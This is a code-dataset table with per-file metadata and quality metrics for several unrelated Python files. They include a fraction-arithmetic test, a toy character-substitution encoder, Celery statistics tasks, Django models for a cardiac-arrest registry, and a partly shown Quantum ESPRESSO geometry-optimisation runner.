hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
85d84988da11a476dce7c74f79d147f461a965d2 | 98 | py | Python | tests/fractions_tok/addition.py | aroberge/importhooks | 57483ce24d265d391587f6321954f2ed60f04afd | [
"MIT"
] | 36 | 2020-02-23T19:06:24.000Z | 2022-02-20T22:53:02.000Z | tests/fractions_tok/addition.py | aroberge/importhooks | 57483ce24d265d391587f6321954f2ed60f04afd | [
"MIT"
] | 13 | 2020-02-21T15:25:40.000Z | 2021-07-01T09:56:35.000Z | tests/fractions_tok/addition.py | aroberge/importhooks | 57483ce24d265d391587f6321954f2ed60f04afd | [
"MIT"
] | 1 | 2020-11-05T13:12:07.000Z | 2020-11-05T13:12:07.000Z | print("1 / 10 + 2 / 10 = ", 1 / 10 + 2 / 10)
assert 1 / 10 + 2 / 10 == 3 / 10, "simple addition"
| 24.5 | 51 | 0.469388 | 18 | 98 | 2.555556 | 0.444444 | 0.195652 | 0.26087 | 0.391304 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.313433 | 0.316327 | 98 | 3 | 52 | 32.666667 | 0.373134 | 0 | 0 | 0 | 0 | 0 | 0.336735 | 0 | 0 | 0 | 0 | 0 | 0.5 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0.5 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 9 |
85de7d1934df09fd14efcf602409f4521903938e | 5,674 | py | Python | Message encoder.py | cjw0621/Growing-Python | 50d754ab0a9d32f2284b3732df046f1ce849eca4 | [
"Unlicense"
] | 1 | 2021-11-21T01:51:30.000Z | 2021-11-21T01:51:30.000Z | Message encoder.py | cjw0621/Growing-Python | 50d754ab0a9d32f2284b3732df046f1ce849eca4 | [
"Unlicense"
] | null | null | null | Message encoder.py | cjw0621/Growing-Python | 50d754ab0a9d32f2284b3732df046f1ce849eca4 | [
"Unlicense"
] | null | null | null | def make_encoded(user_input):
user_input = user_input.replace("a", "~")
user_input = user_input.replace("A", "~")
user_input = user_input.replace("b", "@")
user_input = user_input.replace("B", "@")
user_input = user_input.replace("c", "#")
user_input = user_input.replace("C", "#")
user_input = user_input.replace("d", "$")
user_input = user_input.replace("D", "$")
user_input = user_input.replace("e", "%")
user_input = user_input.replace("E", "%")
user_input = user_input.replace("f", "^")
user_input = user_input.replace("F", "^")
user_input = user_input.replace("g", "&")
user_input = user_input.replace("G", "&")
user_input = user_input.replace("h", "*")
user_input = user_input.replace("H", "*")
user_input = user_input.replace("i", "(")
user_input = user_input.replace("I", "(")
user_input = user_input.replace("j", ")")
user_input = user_input.replace("J", ")")
user_input = user_input.replace("k", "-")
user_input = user_input.replace("K", "-")
user_input = user_input.replace("l", "=")
user_input = user_input.replace("L", "=")
user_input = user_input.replace("m", "+")
user_input = user_input.replace("M", "+")
user_input = user_input.replace("n", "`")
user_input = user_input.replace("N", "`")
user_input = user_input.replace("o", ",")
user_input = user_input.replace("O", ",")
user_input = user_input.replace("p", "<")
user_input = user_input.replace("P", "<")
user_input = user_input.replace("q", ".")
user_input = user_input.replace("Q", ".")
user_input = user_input.replace("r", ">")
user_input = user_input.replace("R", ">")
user_input = user_input.replace("s", "/")
user_input = user_input.replace("S", "/")
user_input = user_input.replace("t", "?")
user_input = user_input.replace("T", "?")
user_input = user_input.replace("u", "[")
user_input = user_input.replace("U", "[")
user_input = user_input.replace("v", "]")
user_input = user_input.replace("V", "]")
user_input = user_input.replace("w", "|")
user_input = user_input.replace("W", "|")
user_input = user_input.replace("x", "}")
user_input = user_input.replace("X", "}")
user_input = user_input.replace("y", "{")
user_input = user_input.replace("Y", "{")
user_input = user_input.replace("z", ";")
user_input = user_input.replace("Z", ";")
return user_input
def make_decoded(user_input):
user_input = user_input.replace("~", "a")
user_input = user_input.replace("~", "A")
user_input = user_input.replace("@", "b")
user_input = user_input.replace("@", "B")
user_input = user_input.replace("#", "c")
user_input = user_input.replace("#", "C")
user_input = user_input.replace("$", "d")
user_input = user_input.replace("$", "D")
user_input = user_input.replace("%", "e")
user_input = user_input.replace("%", "E")
user_input = user_input.replace("^", "f")
user_input = user_input.replace("^", "F")
user_input = user_input.replace("&", "g")
user_input = user_input.replace("&", "G")
user_input = user_input.replace("*", "h")
user_input = user_input.replace("*", "H")
user_input = user_input.replace("(", "i")
user_input = user_input.replace("(", "I")
user_input = user_input.replace(")", "j")
user_input = user_input.replace(")", "J")
user_input = user_input.replace("-", "k")
user_input = user_input.replace("-", "K")
user_input = user_input.replace("=", "l")
user_input = user_input.replace("=", "L")
user_input = user_input.replace("+", "m")
user_input = user_input.replace("+", "M")
user_input = user_input.replace("`", "n")
user_input = user_input.replace("`", "N")
user_input = user_input.replace(",", "o")
user_input = user_input.replace(",", "O")
user_input = user_input.replace("<", "p")
user_input = user_input.replace("<", "P")
user_input = user_input.replace(".", "q")
user_input = user_input.replace(".", "Q")
user_input = user_input.replace(">", "r")
user_input = user_input.replace(">", "R")
user_input = user_input.replace("/", "s")
user_input = user_input.replace("/", "S")
user_input = user_input.replace("?", "t")
user_input = user_input.replace("?", "T")
user_input = user_input.replace("[", "u")
user_input = user_input.replace("[", "U")
user_input = user_input.replace("]", "v")
user_input = user_input.replace("]", "V")
user_input = user_input.replace("|", "w")
user_input = user_input.replace("|", "W")
user_input = user_input.replace("}", "x")
user_input = user_input.replace("}", "X")
user_input = user_input.replace("{", "y")
user_input = user_input.replace("{", "Y")
user_input = user_input.replace(";", "z")
user_input = user_input.replace(";", "Z")
return user_input
loop = False
while loop == False:
y_n = input("Do you have a message you would like to decode? -> ")
print(y_n)
if y_n == "y" or y_n == "Y" or y_n == "yes" or y_n == "Yes" or y_n == "YES":
user_input = input("Whats your encoded message? -> ")
print(make_decoded(user_input))
elif y_n == "n" or y_n == "N" or y_n == "no" or y_n == "No" or y_n == "NO":
user_input = input("What would you like encoded? -> ")
print(make_encoded(user_input))
else:
print("Your response is invalid, please to ensure youre only using letters.")
user_input = y_n
print(user_input)
loop == False | 42.984848 | 86 | 0.594466 | 748 | 5,674 | 4.195187 | 0.085562 | 0.625239 | 0.439133 | 0.608031 | 0.894519 | 0.894519 | 0.88942 | 0.88942 | 0.876992 | 0.876992 | 0 | 0 | 0.20497 | 5,674 | 132 | 87 | 42.984848 | 0.695633 | 0 | 0 | 0.01626 | 0 | 0 | 0.073773 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.01626 | false | 0 | 0 | 0 | 0.03252 | 0.04065 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
c0ac50180aac8a7c789ac715647fd3941ab60825 | 3,122 | py | Python | content_interactions_stats/tasks.py | aaboffill/django-content-interactions | 8ea881e46cc6d5c375542939bb69d2980efdec23 | [
"BSD-3-Clause"
] | null | null | null | content_interactions_stats/tasks.py | aaboffill/django-content-interactions | 8ea881e46cc6d5c375542939bb69d2980efdec23 | [
"BSD-3-Clause"
] | null | null | null | content_interactions_stats/tasks.py | aaboffill/django-content-interactions | 8ea881e46cc6d5c375542939bb69d2980efdec23 | [
"BSD-3-Clause"
] | null | null | null | # coding=utf-8
from celery import shared_task
@shared_task(name='content_interactions.like_process')
def item_like_process(item_id, item_content_type):
from content_interactions_stats.utils import item_like_process
item_like_process(item_id, item_content_type)
@shared_task(name='content_interactions.dislike_process')
def item_dislike_process(item_id, item_content_type):
from content_interactions_stats.utils import item_dislike_process
item_dislike_process(item_id, item_content_type)
@shared_task(name='content_interactions.new_rating_process')
def item_new_rating_process(item_id, item_content_type, rating):
from content_interactions_stats.utils import item_new_rating_process
item_new_rating_process(item_id, item_content_type, rating)
@shared_task(name='content_interactions.update_rating_process')
def item_updated_rating_process(item_id, item_content_type, old_rating, rating):
from content_interactions_stats.utils import item_updated_rating_process
item_updated_rating_process(item_id, item_content_type, old_rating, rating)
@shared_task(name='content_interactions.mark_favorite_process')
def item_marked_favorite_process(item_id, item_content_type):
from content_interactions_stats.utils import item_marked_favorite_process
item_marked_favorite_process(item_id, item_content_type)
@shared_task(name='content_interactions.unmark_favorite_process')
def item_unmarked_favorite_process(item_id, item_content_type):
from content_interactions_stats.utils import item_unmarked_favorite_process
item_unmarked_favorite_process(item_id, item_content_type)
@shared_task(name='content_interactions.share_process')
def item_shared_process(item_id, item_content_type):
from content_interactions_stats.utils import item_shared_process
item_shared_process(item_id, item_content_type)
@shared_task(name='content_interactions.denounce_process')
def item_denounced_process(item_id, item_content_type):
from content_interactions_stats.utils import item_denounced_process
item_denounced_process(item_id, item_content_type)
@shared_task(name='content_interactions.denounce_removed_process')
def item_denounce_removed_process(item_id, item_content_type):
from content_interactions_stats.utils import item_denounce_removed_process
item_denounce_removed_process(item_id, item_content_type)
@shared_task(name='content_interactions.comment_process')
def item_got_comment_process(item_id, item_content_type):
from content_interactions_stats.utils import item_got_comment_process
item_got_comment_process(item_id, item_content_type)
@shared_task(name='content_interactions.comment_deleted_process')
def item_comment_deleted_process(item_id, item_content_type):
from content_interactions_stats.utils import item_comment_deleted_process
item_comment_deleted_process(item_id, item_content_type)
@shared_task(name='content_interactions.visit_process')
def item_visited_process(item_id, item_content_type):
from content_interactions_stats.utils import item_visited_process
item_visited_process(item_id, item_content_type)
| 41.078947 | 80 | 0.858424 | 439 | 3,122 | 5.571754 | 0.088838 | 0.161897 | 0.127555 | 0.166803 | 0.874898 | 0.80417 | 0.777187 | 0.777187 | 0.687244 | 0.627555 | 0 | 0.000349 | 0.081038 | 3,122 | 75 | 81 | 41.626667 | 0.852213 | 0.003844 | 0 | 0 | 0 | 0 | 0.149984 | 0.149984 | 0 | 0 | 0 | 0 | 0 | 1 | 0.244898 | false | 0 | 0.265306 | 0 | 0.510204 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
c0b529e628f3a72c09629012a1f2718796b37dee | 39 | py | Python | SAKIR/ilk.py | vektorelpython24proje/temelbilgiler | bced2723d247dbb8b10cf86e25ee209635f82921 | [
"MIT"
] | null | null | null | SAKIR/ilk.py | vektorelpython24proje/temelbilgiler | bced2723d247dbb8b10cf86e25ee209635f82921 | [
"MIT"
] | null | null | null | SAKIR/ilk.py | vektorelpython24proje/temelbilgiler | bced2723d247dbb8b10cf86e25ee209635f82921 | [
"MIT"
] | 3 | 2020-10-24T14:36:14.000Z | 2020-10-24T14:41:13.000Z | print("ŞAKİR KAYADAN 25.10.2020 Pazar") | 39 | 39 | 0.769231 | 9 | 39 | 3.444444 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.222222 | 0.076923 | 39 | 1 | 39 | 39 | 0.611111 | 0 | 0 | 0 | 0 | 0 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
c0df6898fa90babf8a53f67c3f1bbcf7e7683899 | 9,452 | py | Python | database/ohca-api/ohca/models.py | SterArcher/OHCA-registry-Slovenia | ad8278a28039503ab6a75d48ffea314de9a759ba | [
"MIT"
] | 1 | 2022-02-28T13:02:14.000Z | 2022-02-28T13:02:14.000Z | database/ohca-api/ohca/models.py | SterArcher/dispatch | ad8278a28039503ab6a75d48ffea314de9a759ba | [
"MIT"
] | 1 | 2022-03-20T10:51:17.000Z | 2022-03-21T07:52:57.000Z | database/ohca-api/ohca/models.py | SterArcher/OHCA-registry-Slovenia | ad8278a28039503ab6a75d48ffea314de9a759ba | [
"MIT"
] | null | null | null | from django.db import models
from django.core.validators import MinValueValidator, MaxValueValidator
class Locale(models.Model):
localID = models.BigAutoField(primary_key=True)
friendlyName = models.TextField()
population = models.IntegerField(default = 0)
attendedCAs = models.IntegerField(default = 0)
attemptedResusc = models.IntegerField(default = 0)
casesDNR = models.IntegerField(default = 0)
casesFutile = models.IntegerField(default = 0)
casesCirculation = models.IntegerField(default = 0)
casesUnknown = models.IntegerField(default = 0)
description = models.JSONField(default = dict)
descriptionSupplemental = models.TextField(null = True, blank = True)
def update(self, *args, **kwargs):
for name,values in kwargs.items():
if not(name == 'localID'):
try:
setattr(self,name,values)
except KeyError:
pass
self.save()
return True
def __str__(self):
return self.friendlyName
class Meta:
db_table = 'locales'
class System(models.Model):
systemID = models.BigAutoField(primary_key=True)
friendlyName = models.TextField()
population = models.IntegerField(default = 0)
attendedCAs = models.IntegerField(default = 0)
attemptedResusc = models.IntegerField(default = 0)
casesDNR = models.IntegerField(default = 0)
casesFutile = models.IntegerField(default = 0)
casesCirculation = models.IntegerField(default = 0)
casesUnknown = models.IntegerField(default = 0)
description = models.JSONField(default = dict)
descriptionSupplemental = models.TextField(null = True, blank = True)
def update(self, *args, **kwargs):
for name,values in kwargs.items():
if not(name == 'systemID'):
try:
setattr(self,name,values)
except KeyError:
pass
self.save()
return True
def __str__(self):
return self.friendlyName
class Meta:
db_table = 'systems'
class CaseReport(models.Model):
caseID = models.CharField(max_length = 32, primary_key = True)
dispatchID = models.CharField(max_length = 32, blank = True, null = True, unique = True)
systemID = models.ForeignKey(System, on_delete = models.DO_NOTHING)
localID = models.ForeignKey(Locale, on_delete = models.DO_NOTHING)
dispIdentifiedCA = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(1)])
dispProvidedCPRinst = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(1)])
age = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(200)])
gender = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(1)])
witnesses = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(3)])
location = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(8)])
bystanderResponse = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(2)])
bystanderResponseTime = models.BigIntegerField(null = True, blank = True, validators=[MaxValueValidator(-1)])
bystanderAED = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(2)])
bystanderAEDTime = models.BigIntegerField(null = True, blank = True, validators=[MaxValueValidator(-1)])
deadOnArrival = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(1)])
firstMonitoredRhy = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(1)])
pathogenesis = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(1), MaxValueValidator(6)])
independentLiving = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(1)])
comorbidities = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(1)])
vad = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(1)])
cardioverterDefib = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(2)])
stemiPresent = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(1)])
responseTime = models.BigIntegerField(null = True, blank = True, validators=[MinValueValidator(-1)])
defibTime = models.BigIntegerField(null = True, blank = True, validators=[MinValueValidator(-1)])
ttm = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(5)])
ttmTemp =models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(400)])
drugs = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(7)])
airwayControl = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(15)])
cprQuality = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(1)])
shocks = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1)])
drugTimings = models.JSONField(default = dict)
vascularAccess = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(4)])
mechanicalCPR = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(3)])
targetVent = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(3)])
reperfusionAttempt = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(8)])
reperfusionTime = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1)])
ecls = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(2)])
iabp = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(1)])
ph = models.DecimalField(max_digits = 5, decimal_places = 3, null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(14)])
lactate = models.DecimalField(max_digits = 10, decimal_places = 5, null = True, blank = True, validators=[MinValueValidator(-1)])
glucose = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(1)])
neuroprognosticTests = models.JSONField(default = dict)
specialistHospital = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(1)])
hospitalVolume = models.IntegerField(null = True, blank = True, validators=[MinValueValidator(-1)])
ecg = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(1)])
ecgBLOB = models.FileField(null = True, blank = True)
targetBP = models.DecimalField(max_digits = 10, decimal_places = 5, null = True, blank = True, validators=[MinValueValidator(-1)])
survived = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(1)])
rosc = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(1)])
roscTime = models.BigIntegerField(null = True, blank = True, validators=[MinValueValidator(-1)])
SurvivalDischarge30d = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(1)])
cpcDischarge = models.SmallIntegerField( null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(5)])
mrsDischarge = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(6)])
survivalStatus = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(1)])
transportToHospital = models.SmallIntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(1)])
treatmentWithdrawn = models.IntegerField(null = True, blank = True, validators=[MinValueValidator(-1)])
cod = models.CharField(max_length = 6, null = True, blank = True)
organDonation = models.IntegerField(null = True, blank = True, validators=[MinValueValidator(-1), MaxValueValidator(1)])
patientReportedOutcome = models.SmallIntegerField(null = True, blank = True)
qualityOfLife = models.JSONField(default = dict)
def update(self, *args, **kwargs):
for name,values in kwargs.items():
if not(name == 'caseID'):
try:
setattr(self,name,values)
except KeyError:
pass
self.save()
return True
def __str__(self):
return self.caseID
class Meta:
db_table = 'cases' | 68.492754 | 150 | 0.714452 | 924 | 9,452 | 7.274892 | 0.16342 | 0.066647 | 0.106367 | 0.139096 | 0.822374 | 0.807795 | 0.801845 | 0.801845 | 0.792621 | 0.692502 | 0 | 0.015716 | 0.165256 | 9,452 | 138 | 151 | 68.492754 | 0.836248 | 0 | 0 | 0.412698 | 0 | 0 | 0.004231 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.047619 | false | 0.02381 | 0.015873 | 0.02381 | 0.809524 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 7 |
c0eb62f3c132cacd12369f13e8b5129d606db945 | 166,643 | py | Python | pymatflow/qe/opt.py | DeqiTang/pymatflow | bd8776feb40ecef0e6704ee898d9f42ded3b0186 | [
"MIT"
] | 6 | 2020-03-06T16:13:08.000Z | 2022-03-09T07:53:34.000Z | pymatflow/qe/opt.py | DeqiTang/pymatflow | bd8776feb40ecef0e6704ee898d9f42ded3b0186 | [
"MIT"
] | 1 | 2021-10-02T02:23:08.000Z | 2021-11-08T13:29:37.000Z | pymatflow/qe/opt.py | DeqiTang/pymatflow | bd8776feb40ecef0e6704ee898d9f42ded3b0186 | [
"MIT"
] | 1 | 2021-07-10T16:28:14.000Z | 2021-07-10T16:28:14.000Z | """
Geometric Optimization calc
"""
import os
import re
import shutil
import numpy as np
import pymatflow.base as base
from pymatflow.remote.server import server_handle
from pymatflow.qe.pwscf import PwScf
class OptRun(PwScf):
"""
structural optimization uses both energies and forces to locate the minima
along serach directions. usually insufficient scf convergence will lead to
bad convergence of BFGS algorithm or even to errors. so when doing geometric
optimization, we better set parameters to get a good scf convergece.
when you structure is small, use a large kpoint set, or the optimization
will not be reliable. if you structure is big enough, a small kpoint set
will usually suffice the requirement.
"""
def __init__(self):
super().__init__()
self.arts.ifstatic = False
def relax(self, directory="tmp-qe-relax", inpname="relax.in", output="relax.out", runopt="gen", auto=0):
"""
:param directory: a place for all the generated files
"""
#self.set_relax()
if runopt == "gen" or runopt == "genrun":
if os.path.exists(directory):
shutil.rmtree(directory)
os.mkdir(directory)
#os.system("cp *.UPF %s/" % directory)
#os.system("cp %s %s/" % (self.arts.xyz.file, directory))
# do not copy too many files at the same time or it will be slow
# so we do not copy all UPF files in the directory but just copy
# those used in the calculation.
shutil.copyfile(self.arts.xyz.file, os.path.join(directory, os.path.basename(self.arts.xyz.file)))
#all_upfs = [s for s in os.listdir() if s.split(".")[-1] == "UPF"]
all_file = os.listdir()
for element in self.arts.xyz.specie_labels:
for item in all_file:
#if re.match("(%s)(.*)(upf)" % element, item, re.IGNORECASE):
#if item.split(".")[0].lower() == element.lower() or item.split("_")[0].lower() == element.lower():
if re.match("(%s)(.*)(upf)" % element, item, re.IGNORECASE) or re.match("(%s)(_*)(upf)" % element, item, re.IGNORECASE):
shutil.copyfile(item, os.path.join(directory, item))
break
self.arts.pseudo.dir = os.path.abspath(directory)
self.control.set_params({"pseudo_dir": os.path.abspath(directory)})
#
with open(os.path.join(directory, inpname), 'w') as fout:
self.control.to_in(fout)
self.system.to_in(fout)
self.electrons.to_in(fout)
self.ions.to_in(fout)
self.arts.to_in(fout)
# gen yhbatch script
self.gen_llhpc(directory=directory, inpname=inpname, output=output, cmd="$PMF_PWX")
# gen pbs script
self.gen_pbs(directory=directory, inpname=inpname, output=output, cmd="$PMF_PWX", jobname=self.run_params["jobname"], nodes=self.run_params["nodes"], ppn=self.run_params["ppn"], queue=self.run_params["queue"])
# gen cdcloud script
self.gen_cdcloud(directory=directory, inpname=inpname, output=output, cmd="$PMF_PWX")
if runopt == "run" or runopt == "genrun":
os.chdir(directory)
os.system("%s $PMF_PWX < %s | tee %s" % (self.run_params["mpi"], inpname, output))
os.chdir("../")
server_handle(auto=auto, directory=directory, jobfilebase="relax", server=self.run_params["server"])
def vc_relax(self, directory="tmp-qe-vc-relax", inpname="vc-relax.in", output="vc-relax.out", runopt="gen", auto=0):
"""
:param directory: a place for all the generated files
"""
#self.set_vc_relax()
if runopt == "gen" or runopt == "genrun":
if os.path.exists(directory):
shutil.rmtree(directory)
os.mkdir(directory)
#os.system("cp *.UPF %s/" % directory)
#os.system("cp %s %s/" % (self.arts.xyz.file, directory))
# do not copy too many files at the same time or it will be slow
# so we do not copy all UPF files in the directory but just copy
# those used in the calculation.
shutil.copyfile(self.arts.xyz.file, os.path.join(directory, os.path.basename(self.arts.xyz.file)))
#all_upfs = [s for s in os.listdir() if s.split(".")[-1] == "UPF"]
all_file = os.listdir()
for element in self.arts.xyz.specie_labels:
for item in all_file:
#if re.match("(%s)(.*)(upf)" % element, item, re.IGNORECASE):
#if item.split(".")[0].lower() == element.lower() or item.split("_")[0].lower() == element.lower():
if re.match("(%s)(.*)(upf)" % element, item, re.IGNORECASE) or re.match("(%s)(_*)(upf)" % element, item, re.IGNORECASE):
